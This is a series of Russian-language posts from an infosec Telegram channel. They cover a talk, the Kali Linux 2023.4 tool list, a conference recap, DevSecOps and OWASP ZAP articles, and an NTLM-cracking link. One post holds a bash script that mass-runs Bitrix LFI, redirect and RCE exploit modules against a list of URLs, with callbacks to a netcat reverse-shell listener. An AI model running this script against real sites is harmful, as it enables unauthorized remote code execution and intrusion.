⬆️ Выступление ИБэшечка
#выступление

Выступил в Компьютерной Академии TOP. Ребята были очень классные, все покайфовали с доклада. Раздал комплекты стикеров, тем кто рассказал самый интересный варианта похека компании.

Отдельное спасибо администрации Академии, которая смогла оперативно согласовать данное мероприятие и выделить аудиторию.

Выступление получилось на целых 2,5 часа 😎

Вы хотите, чтобы я приехал и выступил у вас? Так ещё и можете это согласовать?! Тогда пишите мне, я всегда за, если у будет время!

🌚 @poxek

💻 Вышла Kali Linux 2023.4 с 15 новыми инструментами

Разработчики представили Kali Linux 2023.4, четвертую и последнюю версию дистрибутива в 2023 году. Новинка уже доступна для загрузки, содержит сразу 15 новых инструментов и GNOME 45.

Команда Offensive Security сообщает, что в финальном релизе этого года в ОС добавлено не так много новых функций, зато версия ядра обновлена до версии 6.3.7, а также появились сразу 15 новых инструментов:

cabby — имплементация клиента TAXII;
cti-taxii-client — библиотека клиента TAXII 2;
enum4linux-ng — следующее поколение enum4linux с дополнительными возможностями (инструмент энумерации Windows/Samba);
exiflooter — поиск геолокации по всем URL-адресам и каталогам изображений;
h8mail — email OSINT и инструмент для поиска утечек паролей;
Havoc — современная и гибкая система управления и контроля для пост-эксплуатации;
OpenTAXII — имплементация сервера TAXII;
PassDetective — сканирование истории shell-команд для обнаружения случайно записанных паролей, API-ключей и секретов;
Portspoof — все 65535 TCP портов всегда открыты и эмулируют сервисы;
Raven — легкий HTTP-сервис загрузки файлов;
ReconSpider — продвинутый фреймворк для OSINT;
rling — RLI Next Gen (Rling), более быстрая многопоточная и многофункциональная альтернатива rli;
Sigma-Cli — список и преобразование правил Sigma в языки запросов;
sn0int — полуавтоматический OSINT-фреймворк и менеджер пакетов;
SPIRE — набор API-интерфейсов SPIFFE Runtime Environment для установления доверия между программными системами.

📌 Я лично заинтересован в enum4linux-ng, h8mail, Havoc и Portspoof.

Если вы тоже не знаете, что такое TAXII, вы не одни такие :D.
TAXII – это протокол, определяющий способы обмена информацией о киберугрозах через службы и средства обмена сообщениями (RESTful API), и набор требований для клиента и сервера. В TAXII поддерживаются две основные модели обмена информации об угрозах – Collection и Channel. 😉

🌚 @poxek

📣 Что я могу сказать про КОД ИБ. Итоги 2023?

⛈ Это было замечательно.
Не смотря на мелкие косяки, которые есть всегда, нетворкинг и организация был на высочайшем уровне, за что отдельная благодарность Ольге Поздняк и всей её команде, включая волонтёров, которые приложили максимум усилий к организации этой конференции.

🔊 Я давно не видел столько коллег в одном месте, а также завел другие знакомства и надеюсь в будущем партнёрства!

❤️ Выиграл подарок Тетрис, как в детстве!

📌 Т.к. я был оффлайн первый раз, то поспрашивал у знакомых, спикеров, что они думают про конференцию, её развитие и организацию в этом году. Они ответили, что за последние несколько лет, Код ИБ развивается, исправляет прошлые недостатки и привносит каждый год что-то новое. Я был с ними абсолютно согласен.

🟢 Фото и видео будут в комментариях

❗️ Также сфотографировался с Лукой и КиберДедом)

🌚 @poxek

🔥 quick-trics_auto.sh

Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.

#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT

for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
        quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
        quick-tricks redirect -u $(sed -n "$i p" scope.txt)
        quick-tricks lfi -u $(sed -n "$i p" scope.txt)
        quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
        quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
        quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done

🍷 Написал скрипт так, чтобы вы его просто запустили, а дальше ушли пить чай.

Но скорее всего у вас вообще не окажется quick-tricks, т.к. автор зачем-то удалил/скрыл репозиторий. Поэтому к этому посту я прикреплю бинарь этого инструмента под Linux.

🌚 @poxek

Митап BI.ZONE x Mephi CTF
#митап #bizone

🕐🕑🕒 🪲

Одним из трендов этого года был DevSecOps 💻, а также чем заменить ушедших вендоров.
Нашёл хорошую статью на эту тему 🤔

Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов

В рамках материала автор рассмотрел следующие вопросы:

➡️ Можно ли платформу ИБ построить бесплатно и в кратчайшие сроки?

➡️ Можно ли ASOC сделать понятным для бизнеса? Бизнес — наш основной заказчик. Понятно, что все процессы и все что мы делаем не для себя, дома ASOC нам не нужен. ИБ‑специалистам это тоже не нужно, все это нужно бизнес‑заказчику. Поэтому нужно сделать платформу, которая будет понятна всем.

➡️ Как оптимизировать процессы ИБ, сократив Time‑to‑Market до минимума? Меня сразу поставили в определенные рамки: проверки практик DevSecOps в CI/CD не должны занимать больше 10–15 минут. Нужно как‑то вписаться в них.

➡️ Как оценить жизненный цикл уязвимости и эффективность работы специалистов ИБ?

➡️ Как подготовиться к включению QG так, чтобы ни один из разработчиков не пострадал?

🌚 @poxek

NTLM to password
#windows

https://ntlm.pw/

thx snovvcrash

🌚 @poxek

🐧 Как в OWASP ZAP создать авторизационный контекст и задействовать его в автоматизации

С вами инженерный отдел по динамическому анализу Swordfish Security. Продолжаем разбирать полезные кейсы, и сегодня мы рассмотрим, как в DAST-сканере OWASP ZAP настроить автоматическую авторизацию в приложении и переиспользовать ее в дальнейших сканированиях.
OWASP ZAP (Zed Attack Proxy) — один из самых популярных инструментов для проверки безопасности веб-приложений. У него широкий диапазон возможностей для обнаружения уязвимостей. Однако, прежде чем начать сканирование, необходимо правильно настроить инструмент, в том числе и авторизацию, чтобы тестировать приложение с одной или нескольких учетных записей.

В комментариях к предыдущем посту про DevSecOps подметили, что в статье ничего не говорилось про DAST. А зря 😈. Поэтому решил дополнить тему статьей про DAST с помощью OWASP ZAP 😁

🌚 @poxek

🧲 LAN-party для пентестеров: прорываемся к домен контроллеру через розетку

Сегодня расскажу про внутренний пентест, в ходе которого мы без учетной записи добрались до администратора домена.

В этом проекте использовались много разнообразных техник: от декомпиляции приложения и расшифровки извлеченных учетных данных, до повышения привилегий через базу данных на сервере и сбора информации от имени учетной записи компьютера. Под катом подробно разобрано, как они сложились в успешный вектор атаки.

🌚 @poxek